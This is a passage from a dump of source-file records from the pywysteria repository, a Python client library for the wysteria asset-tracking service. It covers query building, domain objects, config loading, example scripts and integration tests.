Returns:\n self\n \"\"\"\n self._id = val\n return self\n\n def uri(self, val: str):\n \"\"\"Match on object by it's Uri.\n\n Args:\n val: an Id to match on\n\n Returns:\n self\n \"\"\"\n self._uri = val\n return self\n\n def parent(self, val: str):\n \"\"\"Match object(s) by their parent Id\n\n - Nb. Links do not have a ParentId property.\n\n Args:\n val: an Id to match on\n\n Returns:\n self\n \"\"\"\n self._parent = val\n return self\n\n def version_number(self, val: int):\n \"\"\"Match version(s) by their version number.\n\n - Nb. Only Version objects have this property.\n\n Args:\n val: a number to match on\n\n Returns:\n self\n \"\"\"\n self._versionnumber = val\n return self\n\n def item_type(self, val: str):\n \"\"\"Match Item(s) by their item_type.\n\n - Nb. Only Item objects have this property.\n\n Args:\n val: a string to match on\n\n Returns:\n self\n \"\"\"\n self._itemtype = val\n return self\n\n def item_variant(self, val):\n \"\"\"Match Item(s) by their item_variant.\n\n - Nb. Only Item objects have this property.\n\n Args:\n val: a string to match on\n\n Returns:\n self\n \"\"\"\n self._variant = val\n return self\n\n def has_facets(self, **kwargs):\n \"\"\"Match objects on the given facets.\n\n Args:\n **kwargs:\n\n Returns:\n self\n \"\"\"\n self._facets = copy.copy(kwargs)\n return self\n\n def name(self, val: str):\n \"\"\"Set a name string to match objects on.\n\n - Nb. Collections, Resources and Links all have a 'name' property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._name = val\n return self\n\n def resource_type(self, val: str):\n \"\"\"Set a resource type to match Resources on.\n\n - Nb. 
Only Resources have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._resourcetype = val\n return self\n\n def resource_location(self, val: str):\n \"\"\"Set a location to match Resources on.\n\n - Nb. Only Resources have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._location = val\n return self\n\n def link_destination(self, val: str):\n \"\"\"Set a link destination Id to match Links on.\n\n - Nb. Only Links have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._linkdst = val\n return self\n\n def link_source(self, val: str):\n \"\"\"Set a link source Id to match Links on.\n\n - Nb. Only Links have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._linksrc = val\n return self\n\n def __repr__(self):\n return \"<%s>\" % self.__class__.__name__\n" }, { "alpha_fraction": 0.5909090638160706, "alphanum_fraction": 0.596256673336029, "avg_line_length": 16.809524536132812, "blob_id": "4b26af09dd809329da1d2254c980cc867abfb7db", "content_id": "00216ac79a3005a0e3b6c95e67ef08a87a625e6c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/examples/08/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample08: Sub collections\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n collection = client.create_collection(\"foo\")\n foo_maps = collection.create_collection(\"maps\")\n\n print(collection)\n print(foo_maps)\n\n print(\"Parent of foo_maps\", foo_maps.get_parent())\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5152343511581421, "alphanum_fraction": 0.516796886920929, "avg_line_length": 22.703702926635742, "blob_id": "f38852883ea2b584036c18063de2d0f159885f8b", "content_id": "640cd052464308d515aa24b9dc59d51821d7d1ef", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2560, "license_type": "permissive", "max_line_length": 79, "num_lines": 108, "path": "/wysteria/domain/resource.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Resource(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._resourcetype = kwargs.get(\"resourcetype\")\n self._name = kwargs.get(\"name\")\n self._location = kwargs.get(\"location\")\n\n def __eq__(self, other):\n if not isinstance(other, Resource):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.name == other.name,\n self.resource_type == other.resource_type,\n self.location == other.location,\n ])\n\n @property\n def resource_type(self) -> str:\n \"\"\"Return the type of this resource\n\n Returns:\n str\n \"\"\"\n return self._resourcetype\n\n def delete(self):\n \"\"\"Delete this resource.\"\"\"\n return self.__conn.delete_resource(self.id)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this resource\n\n Returns:\n str\n \"\"\"\n return self._name\n\n @property\n def location(self) -> str:\n \"\"\"Return the location URI of this resource\n\n Returns:\n str\n \"\"\"\n return self._location\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n 
domain.Item or None\n \"\"\"\n results = self.__conn.find_versions(\n [QueryDesc().id(self._parent)], limit=1\n )\n if results:\n return results[0]\n return None\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_resources([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _encode(self) -> dict:\n \"\"\"Encode this resource as a dict\n\n Returns:\n duct\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"parent\": self.parent,\n \"name\": self.name,\n \"resourcetype\": self.resource_type,\n \"location\": self.location,\n \"facets\": self.facets,\n }\n\n def _update_facets(self, facets: dict):\n \"\"\"Update this resource facets with the given facets\n\n Args:\n facets (dict):\n\n \"\"\"\n self.__conn.update_resource_facets(self.id, facets)\n" }, { "alpha_fraction": 0.5363873839378357, "alphanum_fraction": 0.537837028503418, "avg_line_length": 27.040651321411133, "blob_id": "9f4aa98b68be7d2bb438856a93356a11996b457b", "content_id": "3063856d70e6fed27aa18a6afb0f6976f8112fb7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6898, "license_type": "permissive", "max_line_length": 91, "num_lines": 246, "path": "/wysteria/domain/version.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\nfrom wysteria.domain.resource import Resource\nfrom wysteria.domain.link import Link\nfrom wysteria import constants as consts\n\n\nclass Version(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._number = kwargs.get(\"number\")\n\n def __eq__(self, other):\n if not isinstance(other, Version):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.version == other.version,\n ])\n\n @property\n def _default_child_facets(self) -> dict:\n \"\"\"Returns some helpful default facets to set on child objects.\n\n Returns:\n dict\n \"\"\"\n facets = {}\n for k, v in (\n (consts.FACET_COLLECTION, self.facets.get(consts.FACET_COLLECTION)),\n (consts.FACET_ITEM_TYPE, self.facets.get(consts.FACET_ITEM_TYPE)),\n (consts.FACET_ITEM_VARIANT, self.facets.get(consts.FACET_ITEM_VARIANT)),\n (\"version\", \"%s\" % self.version),\n ):\n if not v:\n continue\n\n facets[k] = v\n return facets\n\n def delete(self):\n \"\"\"Delete this version.\"\"\"\n return self.__conn.delete_version(self.id)\n\n def add_resource(self, name, resource_type, location, facets=None):\n \"\"\"Create resource with given params as child of this version\n\n Args:\n name (str):\n resource_type (str):\n location (str):\n facets (dict): set some initial facets\n\n Returns:\n domain.Resource\n \"\"\"\n cfacets = self._default_child_facets\n if facets:\n cfacets.update(facets)\n\n r = Resource(\n self.__conn,\n parent=self.id,\n name=name,\n resourcetype=resource_type,\n location=location,\n facets=cfacets,\n )\n r._id = self.__conn.create_resource(r)\n return r\n\n def get_resources(self, name=None, resource_type=None):\n \"\"\"Return a list of resources associated with this version.\n\n Args:\n name (str): only return resources with the given name\n resource_type (str): only return resources with the given type\n\n Returns:\n []domain.Resource\n \"\"\"\n query = QueryDesc().parent(self.id)\n if name:\n 
query.name(name)\n if resource_type:\n query.resource_type(resource_type)\n return self.__conn.find_resources([query])\n\n def get_linked_by_name(self, name):\n \"\"\"Get linked Items by the link name\n\n Args:\n name (str):\n\n Returns:\n []domain.Version\n \"\"\"\n if not name:\n return []\n\n # step 1: grab all links whose source is our id of the correct name\n link_query = [QueryDesc().link_source(self.id).name(name)]\n links = self.__conn.find_links(link_query)\n\n # step 2: grab all vers whose id is the destination of one of our links\n version_query = [QueryDesc().id(l.destination) for l in links]\n return self.__conn.find_versions(version_query)\n\n def get_linked(self):\n \"\"\"Get all linked version and return a dict of link name (str) to\n []version\n\n Returns:\n dict\n \"\"\"\n # step 1: grab all links whose source is our id\n link_query = [QueryDesc().link_source(self.id)]\n links = self.__conn.find_links(link_query)\n\n # step 2: build version query, and record version id -> link name map\n version_id_to_link_name = {}\n version_query = []\n for link in links:\n desired_version_id = link.destination\n version_id_to_link_name[desired_version_id] = link.name\n version_query.append(\n QueryDesc().id(link.destination)\n )\n\n # step 3: return matching version list\n versions = self.__conn.find_versions(version_query)\n\n # step 4: build into link name -> []version map\n result = {}\n for version in versions:\n link_name = version_id_to_link_name.get(version.id)\n if not link_name:\n continue\n\n # ToDO: Rework into collections.defaultdict\n tmp = result.get(link_name, [])\n tmp.append(version)\n result[link_name] = tmp\n return result\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_versions([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _encode(self) -> dict:\n \"\"\"Encode this as a JSONifiable dict\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"number\": self.version,\n \"parent\": self.parent,\n \"facets\": self.facets,\n }\n\n def link_to(self, name, version, facets=None):\n \"\"\"Create link between two versions\n\n Args:\n name (str):\n version (domain.Version):\n facets (dict): some defaults facets to add to link\n\n Raises:\n ValueError if given version not of type Version\n \"\"\"\n if not isinstance(version, self.__class__):\n raise ValueError(\n f\"Expected Versiob to be of type Version, got {version.__class__.__name__}\"\n )\n\n cfacets = self._default_child_facets\n cfacets[consts.FACET_LINK_TYPE] = consts.VALUE_LINK_TYPE_VERSION\n if facets:\n cfacets.update(facets)\n\n lnk = Link(\n self.__conn,\n src=self.id,\n dst=version.id,\n name=name,\n facets=cfacets,\n )\n lnk._id = self.__conn.create_link(lnk)\n return lnk\n\n def publish(self):\n \"\"\"Set this version as the published one\"\"\"\n self.__conn.publish_version(self.id)\n\n def _update_facets(self, facets):\n \"\"\"Set given key / value pairs in version facets\n\n Args:\n facets (dict):\n\n \"\"\"\n self.__conn.update_version_facets(\n self.id,\n facets\n )\n\n @property\n def version(self) -> int:\n \"\"\"Return the version number of this version\n\n Returns:\n int\n \"\"\"\n return self._number\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n domain.Item or None\n \"\"\"\n results = self.__conn.find_items(\n [QueryDesc().id(self._parent)], limit=1\n )\n if results:\n return results[0]\n return None\n" }, 
{ "alpha_fraction": 0.7463651299476624, "alphanum_fraction": 0.7512116432189941, "avg_line_length": 33.38888931274414, "blob_id": "74b7ef8a4c35a96b1806aedcd4eab909a2c87f29", "content_id": "67b0f75ea128e3de651d3dbee699b18b956c9273", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "permissive", "max_line_length": 86, "num_lines": 18, "path": "/wysteria/constants.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# Where applicable, these facets are populated automatically by the client\nFACET_COLLECTION = \"collection\"\nFACET_ITEM_TYPE = \"itemtype\"\nFACET_ITEM_VARIANT = \"variant\"\nFACET_LINK_TYPE = \"linktype\"\n\n# Where FACET_LINK_TYPE is used, the value will be one of these VALUE_LINK_TYPE_* vars\nVALUE_LINK_TYPE_ITEM = \"item\"\nVALUE_LINK_TYPE_VERSION = \"version\"\n\n# A default for the 'limit' field send to wysteria on a search request.\nDEFAULT_QUERY_LIMIT = 500\n\nERR_ALREADY_EXISTS = \"already-exists\"\nERR_INVALID = \"invalid-input\"\nERR_ILLEGAL = \"illegal-operation\"\nERR_NOT_FOUND = \"not-found\"\nERR_NOT_SERVING = \"operation-rejected\"\n" }, { "alpha_fraction": 0.7176806330680847, "alphanum_fraction": 0.7176806330680847, "avg_line_length": 24.0238094329834, "blob_id": "db1eb3285d66f067f968607b28d46016809440fc", "content_id": "3b805649fc752c996a6d22424bc074b8e97285fb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 95, "num_lines": 42, "path": "/wysteria/errors.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\nclass RequestTimeoutError(Exception):\n \"\"\"The request took too long to come back -> something is down?\"\"\"\n pass\n\n\nclass UnknownMiddlewareError(Exception):\n \"\"\"The config asks to use a middleware for which we can't find a class definition\"\"\"\n pass\n\n\nclass NoServersError(Exception):\n \"\"\"No server(s) were found, or we were unable to establish a connection to them\"\"\"\n pass\n\n\nclass ConnectionClosedError(Exception):\n \"\"\"The connection has been closed\"\"\"\n pass\n\n\nclass InvalidInputError(Exception):\n \"\"\"The input data is malformed or otherwise invalid\"\"\"\n pass\n\n\nclass AlreadyExistsError(Exception):\n \"\"\"Raised if an attempt was made to create something that already exists\"\"\"\n pass\n\n\nclass NotFoundError(Exception):\n \"\"\"An given ID to some object was not found\"\"\"\n\n\nclass IllegalOperationError(Exception):\n \"\"\"The requested operation is not permitted\"\"\"\n pass\n\n\nclass ServerUnavailableError(Exception):\n \"\"\"The server is currently unavailable. 
(An admin has ordered it not to server requests)\"\"\"\n pass\n" }, { "alpha_fraction": 0.6278981566429138, "alphanum_fraction": 0.6278981566429138, "avg_line_length": 24.298076629638672, "blob_id": "d967c39ca57132d898f3ad9a1c64c06894e0e654", "content_id": "8217e7a4c93d315d045be572f7f5fcf39e06f285", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2631, "license_type": "permissive", "max_line_length": 77, "num_lines": 104, "path": "/wysteria/utils.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import os\nimport configparser\nfrom collections import namedtuple\n\nfrom wysteria.client import Client\n\n\n_DEFAULT_FILENAME = \"wysteria-client.ini\"\n_DEFAULT_ENV_VAR = \"WYSTERIA_CLIENT_INI\"\n\n_KEY_MWARE = \"middleware\"\n_KEY_MWARE_DRIVER = \"driver\"\n_KEY_MWARE_CONF = \"config\"\n_KEY_MWARE_SSL_CERT = \"sslcert\"\n_KEY_MWARE_SSL_KEY = \"sslkey\"\n_KEY_MWARE_SSL_PEM = \"sslpem\"\n_KEY_MWARE_SSL_VERIFY = \"sslverify\"\n_KEY_MWARE_SSL_ENABLE = \"sslenabletls\"\n\n\n_SSLConfig = namedtuple(\"SSLConfig\", [\n \"key\", \"cert\", \"pem\", \"verify\", \"enable\",\n])\n\n\ndef _wysteria_config() -> str:\n \"\"\"Return path to default config, if found\n\n Returns:\n str or None\n \"\"\"\n for f in [_DEFAULT_FILENAME, os.environ.get(_DEFAULT_ENV_VAR)]:\n if not f:\n continue\n if os.path.exists(f):\n return f\n return None\n\n\ndef _read_config(configpath: str) -> dict:\n \"\"\"Read in config file & return as dict\n\n Args:\n configpath (str):\n\n Returns:\n dict\n \"\"\"\n config = configparser.ConfigParser()\n config.read(configpath)\n\n data = {}\n for section in config.sections():\n data[section.lower()] = {}\n for opt in config.options(section):\n data[section.lower()][opt.lower()] = config.get(section, opt)\n return data\n\n\ndef from_config(configpath: str) -> Client:\n \"\"\"Build a wysteria Client from a given config file.\n\n Args:\n configpath (str): path to a config file\n\n Returns:\n wysteria.Client\n \"\"\"\n data = _read_config(configpath)\n middleware = data.get(_KEY_MWARE, {})\n\n tls = _SSLConfig(\n middleware.get(_KEY_MWARE_SSL_KEY),\n middleware.get(_KEY_MWARE_SSL_CERT),\n middleware.get(_KEY_MWARE_SSL_PEM),\n middleware.get(_KEY_MWARE_SSL_VERIFY, \"false\") == 'true',\n middleware.get(_KEY_MWARE_SSL_ENABLE, \"false\") == 'true',\n )\n\n return Client(\n url=middleware.get(_KEY_MWARE_CONF),\n middleware=middleware.get(_KEY_MWARE_DRIVER, \"nats\"),\n tls=tls,\n )\n\n\ndef default_client() -> Client:\n \"\"\"Build a wysteria client, checking default config locations (in order)\n - wysteria-client.ini\n - WYSTERIA_CLIENT_INI (env var)\n\n And falling back to a default config (no ssl & nats on the localhost).\n\n For security purposes, it is generally recommended you build the client\n youself, using your own certs & requiring signed certs to be presented by\n the server.\n\n Returns:\n wysteria.Client\n \"\"\"\n config_file = _wysteria_config()\n if not config_file:\n return Client() # default with no extra config\n return from_config(config_file)\n" }, { "alpha_fraction": 0.5311191082000732, "alphanum_fraction": 0.5323159694671631, "avg_line_length": 24.127819061279297, "blob_id": "084ca2b7ecba7e20fd0bcbc50c811c0c8b5d9fa8", "content_id": "e572b6b6426c5d664d38b1dfc54f01d7e1cc054c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3342, "license_type": "permissive", "max_line_length": 83, "num_lines": 133, 
"path": "/tests/integration/tests/domain/resource_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestResource:\n \"\"\"Tests for the Resource class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item = cls.collection.create_item(_rs(), _rs())\n cls.version = cls.item.create_version()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def _single_resource(self, id_):\n \"\"\"Return a single resource by it's id\n\n Args:\n id_:\n\n Returns:\n Resource\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n results = s.find_resources(limit=1)\n assert results\n return results[0]\n\n def test_create_resource_raises_on_duplicate(self):\n # arrange\n args = (_rs(), _rs(), _rs())\n self.version.add_resource(*args)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.version.add_resource(*args)\n\n def test_create_resource_doesnt_raise_on_same_resource_different_version(self):\n # arrange\n args = (_rs(), _rs(), _rs())\n other_version = self.item.create_version()\n\n self.version.add_resource(*args)\n\n # act\n other_version.add_resource(*args)\n\n # assert\n assert True\n\n def test_delete_resource(self):\n # arrange\n resource = self.version.add_resource(_rs(), _rs(), _rs())\n\n s = self.client.search()\n s.params(id=resource.id)\n\n # act\n resource.delete()\n results = s.find_resources(limit=1)\n\n # assert\n assert not results\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n resource = self.version.add_resource(_rs(), _rs(), _rs())\n\n # act\n resource.update_facets(**facets)\n remote = self._single_resource(resource.id)\n\n # assert\n assert resource\n assert remote\n assert remote == resource\n for k, v in facets.items():\n assert resource.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_resource(self):\n # arrange\n name = _rs()\n type_ = _rs()\n location = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n resource = self.version.add_resource(name, type_, location, facets=facets)\n remote = self._single_resource(resource.id)\n\n # assert\n assert resource\n assert remote\n assert remote == resource\n assert name == remote.name == resource.name\n assert location == remote.location == resource.location\n assert type_ == remote.resource_type == resource.resource_type\n assert resource.id\n assert resource.uri\n assert remote.id\n assert remote.uri\n for k, v in facets.items():\n assert resource.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.7451984882354736, "alphanum_fraction": 0.7451984882354736, "avg_line_length": 18.04878044128418, "blob_id": "12d5e557d0716b6d64896251d5efaeef6170b869", "content_id": "44bbfe5a00f7e81ec575576a670b755eb7b1e0a0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 781, "license_type": "permissive", "max_line_length": 93, "num_lines": 41, "path": "/wysteria/middleware/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"Middleware contains the actual communication logic for talking to 
wysteria.\n\n\nFiles\n-----\n\nabstract_middleware.py\n An abstract class contract that a subclass must implement in order to be used as a viable\n middleware.\n\nimpl_nats.py\n A Nats.io implementation of the abstract middleware class.\n\nimpl_grpc.py\n A gRPC implementation of the the middleware class\n\nwgrpc/\n Auto generated files for gRPC by protobuf.\n\n\nExported\n--------\n\n NatsMiddleware\n A Nats.io implementation of the abstract middleware class\n\n GRPCMiddleware\n A gRPC implementation of the the middleware class\n\n\n\n\"\"\"\n\nfrom wysteria.middleware.impl_nats import NatsMiddleware\nfrom wysteria.middleware.impl_grpc import GRPCMiddleware\n\n\n__all__ = [\n \"NatsMiddleware\",\n \"GRPCMiddleware\",\n]\n" }, { "alpha_fraction": 0.6107977628707886, "alphanum_fraction": 0.6156325340270996, "avg_line_length": 30.024999618530273, "blob_id": "b6742ace5157b2454c6e91529135a84f4a06bb9f", "content_id": "f6ddc9281134ff10f9d7486bc9be4ad8bf0909a3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "permissive", "max_line_length": 80, "num_lines": 40, "path": "/examples/04/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample04: Searching via builtin facets & using links\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n\n # Wysteria will have added some facets auto-magically for us,\n # and it pays when searching for Versions to be as specific as possible\n search.params(facets={\n wysteria.FACET_COLLECTION: \"maps\",\n wysteria.FACET_ITEM_TYPE: \"2dmap\",\n wysteria.FACET_ITEM_VARIANT: \"forest\",\n })\n\n # grab the version we made earlier\n forest_version = search.find_versions()[0]\n\n # pull out all linked versions, regardless of their names\n result = forest_version.get_linked()\n\n # if you recall, we made two links from forest01 both named \"input\"\n print(\"All linked versions (link name: version)\")\n for link_name, versions in result.items():\n for version in versions:\n print(link_name, version)\n\n # On the other hand, we could just request linked versions named \"input\"\n print(\"linked 'input' versions\")\n for version in forest_version.get_linked_by_name(\"input\"):\n print(version)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5197121500968933, "alphanum_fraction": 0.5197121500968933, "avg_line_length": 20.890411376953125, "blob_id": "eb65d98cc018d7d84a57d1017b6a8b0ec597e78f", "content_id": "f942607362747a66e653c10cc1131423dac6fea0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3196, "license_type": "permissive", "max_line_length": 95, "num_lines": 146, "path": "/wysteria/domain/base.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import abc\nimport copy\n\n\nclass WysBaseObj(metaclass=abc.ABCMeta):\n \"\"\"\n Represents a wysteria obj in the most general sense\n \"\"\"\n\n def __init__(self, **kwargs):\n self._id = kwargs.get(\"id\", \"\")\n self._uri = kwargs.get(\"uri\", \"\")\n self._facets = kwargs.get(\"facets\", {})\n\n def encode(self) -> dict:\n \"\"\"Encode this obj into a dict\n\n Returns:\n dict\n \"\"\"\n return copy.copy(self._encode())\n\n @abc.abstractmethod\n def _encode(self) -> dict:\n \"\"\"Return a dict version of the object\n\n Returns:\n dict\n \"\"\"\n pass\n\n @property\n def id(self) -> str:\n \"\"\"Return the ID 
of this object\n\n Returns:\n str\n \"\"\"\n return self._id\n\n @abc.abstractmethod\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n # Nb. This property is the only one we don't know on creation as it's determined on the\n # server and isn't auto returned.\n pass\n\n @property\n def uri(self) -> str:\n \"\"\"Return the unique URI for this object.\n\n Returns:\n str\n\n Raises:\n ValueError if the URI cannot be found / constructed\n \"\"\"\n if not self._uri:\n self._uri = self._fetch_uri()\n\n if not self._uri:\n raise ValueError(\"Unable to fetch URI\")\n\n return self._uri\n\n @property\n def facets(self) -> dict:\n \"\"\"Return a copy of this object's facets\n\n Returns:\n dict\n \"\"\"\n return copy.copy(self._facets)\n\n def update_facets(self, **kwargs):\n \"\"\"Update this object's facets with the give key / values pairs.\n\n Args:\n **kwargs:\n\n Raises:\n RequestTimeoutError\n \"\"\"\n if not kwargs:\n return\n\n self._update_facets(kwargs)\n self._facets.update(kwargs)\n\n @abc.abstractmethod\n def _update_facets(self, facets):\n \"\"\"Perform the actual wysteria call to update facets.\n\n Args:\n facets (dict):\n\n \"\"\"\n pass\n\n def __str__(self):\n return str(self.encode())\n\n def __repr__(self):\n return \"<%s %s>\" % (self.__class__.__name__, self.id)\n\n\nclass ChildWysObj(WysBaseObj):\n \"\"\"\n Represents a wysteria obj that has a parent obj\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__cached_parent_obj = None\n self._parent = kwargs.get(\"parent\", \"\")\n\n @property\n def parent(self):\n \"\"\"Return the ID of this object's parent\n\n Returns:\n str\n \"\"\"\n return self._parent\n\n @abc.abstractmethod\n def _get_parent(self):\n \"\"\"Return the parent obj of this object.\n\n Returns:\n sub class of WysBaseObj\n \"\"\"\n pass\n\n def get_parent(self):\n \"\"\"Return the parent collection of this item\n\n Returns:\n sub class of WysBaseObj or None\n \"\"\"\n if not self.__cached_parent_obj:\n self.__cached_parent_obj = self._get_parent()\n return self.__cached_parent_obj\n" }, { "alpha_fraction": 0.5264253616333008, "alphanum_fraction": 0.5280268788337708, "avg_line_length": 25.913793563842773, "blob_id": "42fff7eb6c0ff72e1fe378185c1c0f33c4f47589", "content_id": "d7d9173d3a98706cc1882f11315c33b2310ba411", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6244, "license_type": "permissive", "max_line_length": 96, "num_lines": 232, "path": "/wysteria/domain/item.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport wysteria.constants as consts\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\nfrom wysteria.domain.version import Version\nfrom wysteria.domain.link import Link\n\n\nclass Item(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._itemtype = kwargs.get(\"itemtype\", \"\")\n self._variant = kwargs.get(\"variant\", \"\")\n\n def __eq__(self, other):\n if not isinstance(other, Item):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.item_type == other.item_type,\n self.variant == other.variant,\n self.parent == other.parent,\n ])\n\n def _encode(self) -> dict:\n \"\"\"Return a dict representation of this Item\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n 
\"parent\": self._parent,\n \"facets\": self.facets,\n \"itemtype\": self._itemtype,\n \"variant\": self._variant,\n }\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_items([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n @property\n def item_type(self) -> str:\n \"\"\"Return the item type for this Item\n\n Returns:\n str\n \"\"\"\n return self._itemtype\n\n @property\n def variant(self) -> str:\n \"\"\"Return the item variant of this Item\n\n Returns:\n str\n \"\"\"\n return self._variant\n\n def delete(self):\n \"\"\"Delete this item.\"\"\"\n return self.__conn.delete_item(self.id)\n\n def get_linked_by_name(self, name: str):\n \"\"\"Get linked Items by the link name\n\n Args:\n name (str):\n\n Returns:\n []domain.Item\n \"\"\"\n if not name:\n return []\n\n # step 1: grab all links whose source is our id of the correct name\n link_query = [QueryDesc().link_source(self.id).name(name)]\n links = self.__conn.find_links(link_query)\n\n # step 2: grab all items whose id is the destination of one of our links\n item_query = [QueryDesc().id(l.destination) for l in links]\n return self.__conn.find_items(item_query)\n\n def get_linked(self) -> dict:\n \"\"\"Get all linked items and return a dict of link name (str) to []item\n\n Returns:\n dict\n \"\"\"\n # step 1: grab all links whose source is our id\n link_query = [QueryDesc().link_source(self.id)]\n links = self.__conn.find_links(link_query)\n\n # step 2: build item query, and record item id -> link name map\n item_id_to_link_name = {}\n item_query = []\n for link in links:\n desired_item_id = link.destination\n item_id_to_link_name[desired_item_id] = link.name\n item_query.append(\n QueryDesc().id(link.destination)\n )\n\n # step 3: return matching item list\n items = self.__conn.find_items(item_query)\n\n # step 4: build into link name -> []item map\n result = {}\n for item in items:\n link_name = item_id_to_link_name.get(item.id)\n if not link_name:\n continue\n\n # ToDO: Rework into collections.defaultdict\n tmp = result.get(link_name, [])\n tmp.append(item)\n result[link_name] = tmp\n return result\n\n def link_to(self, name: str, item, facets: dict=None) -> Link:\n \"\"\"Create link between two items\n\n Args:\n name (str):\n item (domain.Item):\n facets (dict):\n\n Returns:\n Link\n\n Raises:\n ValueError if given item not of type Item\n \"\"\"\n if not isinstance(item, self.__class__):\n raise ValueError(f\"Expected item to be of type Item, got {item.__class__.__name__}\")\n\n cfacets = self._default_child_facets\n cfacets[consts.FACET_LINK_TYPE] = consts.VALUE_LINK_TYPE_ITEM\n if facets:\n cfacets.update(facets)\n\n lnk = Link(\n self.__conn,\n src=self.id,\n dst=item.id,\n 